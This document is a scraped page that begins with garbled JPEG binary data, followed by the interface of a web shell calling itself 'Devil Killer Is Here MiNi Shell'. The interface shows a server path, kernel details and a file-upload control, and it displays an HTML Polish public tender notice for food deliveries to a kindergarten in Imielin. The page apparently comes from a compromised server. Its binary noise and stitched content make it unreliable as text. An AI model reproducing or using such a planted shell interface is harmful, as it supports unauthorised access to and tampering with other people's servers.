JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231106/0047754501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Sukcesywne dostawy artykułów spożywczych na potrzeby<br/>Przedszkola Miejskiego nr 1 w Imielinie<br/>w okresie od 02.01.2024 roku do 31.12.2024 roku” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedszkole Miejskie nr 1 w Imielinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271049312</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojciecha Sapety</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Imielin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-407</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">322256117</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@przedszkole1.imielin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">przedszkolemiejskie.imielin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Sukcesywne dostawy artykułów spożywczych na potrzeby<br/>Przedszkola Miejskiego nr 1 w Imielinie<br/>w okresie od 02.01.2024 roku do 31.12.2024 roku” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2ca9e161-7c76-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00477545</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2ca9e161-7c76-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia między Zamawiającym a<br/>Wykonawcami, w tym przekazywanie dokumentów lub oświadczeń, wniosków, zawiadomień oraz informacji, odbywa się za<br/>pośrednictwem/przy użyciu:<br/>a) portalu e-zamówienia: https://ezamowienia.gov.pl/pl/<br/>b) poczty elektronicznej: sekretariat@przedszkole1.imielin.pl (zalecane oprócz składania ofert).<br/>Zamawiający udostępni link prowadzący bezpośrednio do widoku postępowania na Platformie e-Zamówienia wraz z identyfikatorem<br/>(ID) postępowania oraz adres strony internetowej BIP (Biuletyn Informacji Publicznej) Przedszkola Miejskiego nr 1 w Imielinie na której udostępnione<br/>będą również dokumenty związane z postępowaniem w załączniku nr 5 do SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Przy przekazywaniu dokumentów lub<br/>oświadczeń, wniosków, zawiadomień oraz informacji Zamawiający i Wykonawcy powołują się na nazwę zamówienia lub numer<br/>referencyjny postępowania.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w<br/>zakładce „Centrum Pomocy”.<br/>3. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>4. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia.<br/>5. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia<br/>wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>6. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>9. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>9. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>10. W postępowaniu o udzielenie zamówienia komunikacja (nie dotyczy składania ofert/ wniosków o dopuszczenie do udziału w<br/>postępowaniu) pomiędzy Zamawiającym a Wykonawcami tj. w szczególności składanie oświadczeń, wniosków, zawiadomień,<br/>elektronicznych kopii dokumentów oraz przekazywanie informacji może odbywać się za pośrednictwem dedykowanego formularza:<br/>„Formularz do komunikacji” udostępnionego przez Platformę e-Zamówienia zgodnie z wytycznymi jak w pkt. 15 SWZ, jednak we<br/>wszystkich przypadkach, po za składaniem ofert, Zamawiający jako podstawowe narzędzie elektronicznego komunikowania się z<br/>Wykonawcami preferuje i zaleca pocztę elektroniczną, email: przetargi@imielin.pl. Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwem poczty email wynosi 50 MB.<br/>11. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>12. Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do zamawiającego przed upływem wymaganego terminu. Za<br/>datę przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania drogą elektroniczną.<br/>UWAGA: Ze względu na ograniczoną ilość znaków w tej sekcji ogłoszenia, Zamawiający odsyła Wykonawców do zapisów SW</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W związku z prowadzonym niniejszym postępowaniem o udzielenie zamówienia<br/>publicznego, zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r.<br/>w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1 z<br/>późn. zm), zwanego dalej RODO, Zamawiający informuję, że:<br/>• Administratorem Pani/Pana danych osobowych jest Dyrektor Przedszkola Miejskiego w Imielinie z siedzibą: Imielin (41-407), ul.<br/>Wojciecha Sapety 10,<br/>• Administrator wyznaczył Inspektora ochrony danych, z którym może się Pani/Pan skontaktować w sprawach związanych z ochroną<br/>danych osobowych, pod adresem poczty elektronicznej: iod@imielin.pl lub pisemnie na adres siedziby Administratora.<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego na „„Sukcesywne dostawy artykułów spożywczych na potrzeby Przedszkola Miejskiego w<br/>Imielinie w okresie od 02.01.2024 do 31.12.2024&#34;<br/>&#34; zarejestrowanego podnumerem sprawy PM1. 2.26.261.03.2023 prowadzonym w trybie podstawowym na podstawie art. 275 pkt 1<br/>ustawy PZP;<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 ust. 6 oraz art. 74 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (t.j. Dz. U. z 2021 r. poz. 1129<br/>z późn. zm.);<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego); − wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO , nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego;− prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych, jeśli uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana<br/>dotyczących narusza przepisy RODO;8) nie przysługuje Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do<br/>usunięcia danych osobowych; − prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21<br/>RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust.1 lit. c RODO. 2. Jednocześnie Zamawiający przypomina o ciążącym na Wykonawcy obowiązku<br/>informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w<br/>związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu,<br/>chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.3. Skorzystanie przez osobę, której<br/>dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w<br/>zakresie niezgodnym z ustawą PZP. 4. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o<br/>którym mowa w art. 18 ust. 1RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego<br/>postępowania.5.,,Polityka praw i wolności” obowiązująca w Przedszkolu Miejskim w Imielinie zakłada prawo do: dostępu do treści swoich danych i ich poprawienia, sprostowania, usunięcia, ograniczenia przetwarzania, wniesienia sprzeciwu, cofnięcia zgody na<br/>przetwarzanie. Wycofanie zgody nie ma wpływu na przetwarzanie Pani/Pana danych do momentu jej wycofania. Pani/Pana<br/>prawamogą zostać ograniczone zgodnie z przepisami RODO. Pani/Pana prawa na wniosek zrealizuje Administrator danych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PM1. 2.26.261.01.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie obejmuje sukcesywną dostawę artykułów spożywczych do Przedszkola Miejskiego w Imielinie w celu<br/>przygotowania posiłków dla dzieci w okresie od 02.01.2024 r. do 31.12.2024r z wyłączeniem miesiąca lipca.<br/>2. Szczegółowy wykaz przewidzianych do zamówienia produktów oraz przewidziane ilości<br/>szacunkowe (orientacyjne) tych produktów planowanych do zamówienia w okresie jedenastu<br/>miesięcy został zawarty w załączniku nr 1 do SWZ – Formularzu ofertowym. Podkreśla się<br/>iż podane w Formularzu ofertowym ilości są ilościami szacunkowymi tj<br/>orientacyjnymi, podanymi na potrzeby dokonania oceny ofert i wyboru oferty<br/>najkorzystniejszej oraz określenia wartości umowy. Zamawiający zastrzega, że w ramach<br/>zawartej umowy będzie dokonywał zakupów w ramach danej grupy produktów, wg cen<br/>jednostkowych oferowanych przez Wykonawcę. Ilość zamawianych produktów będzie<br/>uzależniona od potrzeb Zamawiającego. Faktyczne całkowite wynagrodzenie Wykonawcy w<br/>związku z realizacją umowy będzie uzależnione od faktycznej ilości dostarczonych w całym<br/>okresie obowiązywania umowy produktów Art. mleczarskie, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Zamawiający w związku z zapisami punktu 2, zgodnie z zapisem art. 441 ust. 1 ustawy PZP przewiduje zastosowanie prawa opcji do niniejszego zamówienia. Zamawiający przewiduje dwie możliwe opcje. Suma ilości zamawianych poszczególnych produktów może być mniejsza lub większa niż wskazał jako ilości szacunkowe (orientacyjne)w formularzu ofertowym – załącznik nr 1 do SWZ. Oznacza to, że zastrzega możliwość zamówienia mniejszej tj. do 30% ilości poszczególnych produktów wskazanych jako szacunkowe w załączniku nr 1 (formularz ofertowy) lub zwiększenia ilości zamawianych na bieżąco produktów do 50 % więcej niż ilości poszczególnych produktów wskazanych jako szacunkowe w załączniku nr 1 (Formularz ofertowy). <br/>2) Uruchomienie prawa opcji w stanie faktycznym nastąpi od podpisania umowy. Zamawiający na etapie przeprowadzania postępowania o udzielenie zamówienia publicznego nie jest w stanie przedstawić dokładniejszego zakresu zmian ilościowych dla zamawianych poszczególnych produktów. Zamawiający w okresie trwania umowy będzie zamawiał poszczególne produkty na bieżąco w ilościach zależnych od swoich potrzeb. <br/>4) Prawo opcji jest uprawnieniem Zamawiającego, a Wykonawcy z tytułu zastosowania przez Zamawiającego prawa opcji nie będą przysługiwały żadne roszczenia. <br/>5) Cena jednostkowa zamawianych poszczególnych artykułów, zawsze, niezależnie od zastosowanej opcji będzie identyczna jak w Formularzu ofertowym, i która zostanie wyliczona w oparciu o ilości szacunkowe (orientacyjne) podane przez Zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający przewiduje w 2024 roku przeprowadzenie postępowania o udzielenie zamówienia publicznego na dostawę tego<br/>samego rodzaju na rok 2025r. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana będzie oferta, która uzyska najwyższą<br/>liczbę punktów, wynikających z przyjętych kryteriów oceny ofert tj. sumy punktów czterech kryteriów:<br/>Cena (C)<br/>Czas dostawy dodatkowej (awaryjnej )<br/>możliwość uzupełniająca dostawę w ciągu 2 godzin<br/>dostawy między6:00 - 9:00</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas dostawy dodatkowej awaryjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">mozliwość uzupełniająca dostawę w ciągu dwóch godzin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dostawa pomiędzy godzina 6 a 9</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie obejmuje sukcesywną dostawę artykułów spożywczych do Przedszkola Miejskiego w Imielinie w celu<br/>przygotowania posiłków dla dzieci w okresie od 02.01.2024 r. do 31.12.2024r z wyłączeniem miesiąca lipca.<br/>2. Szczegółowy wykaz przewidzianych do zamówienia produktów oraz przewidziane ilości<br/>szacunkowe (orientacyjne) tych produktów planowanych do zamówienia w okresie jedenastu<br/>miesięcy został zawarty w załączniku nr 1 do SWZ – Formularzu ofertowym. Podkreśla się<br/>iż podane w Formularzu ofertowym ilości są ilościami szacunkowymi tj<br/>orientacyjnymi, podanymi na potrzeby dokonania oceny ofert i wyboru oferty<br/>najkorzystniejszej oraz określenia wartości umowy. Zamawiający zastrzega, że w ramach<br/>zawartej umowy będzie dokonywał zakupów w ramach danej grupy produktów, wg cen<br/>jednostkowych oferowanych przez Wykonawcę. Ilość zamawianych produktów będzie<br/>uzależniona od potrzeb Zamawiającego. Faktyczne całkowite wynagrodzenie Wykonawcy w<br/>związku z realizacją umowy będzie uzależnione od faktycznej ilości dostarczonych w całym<br/>okresie obowiązywania umowy produktów Art. mięso i wędliny </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Zamawiający w związku z zapisami punktu 2, zgodnie z zapisem art. 441 ust. 1 ustawy PZP przewiduje zastosowanie prawa opcji do niniejszego zamówienia. Zamawiający przewiduje dwie możliwe opcje. Suma ilości zamawianych poszczególnych produktów może być mniejsza lub większa niż wskazał jako ilości szacunkowe (orientacyjne)w formularzu ofertowym – załącznik nr 1 do SWZ. Oznacza 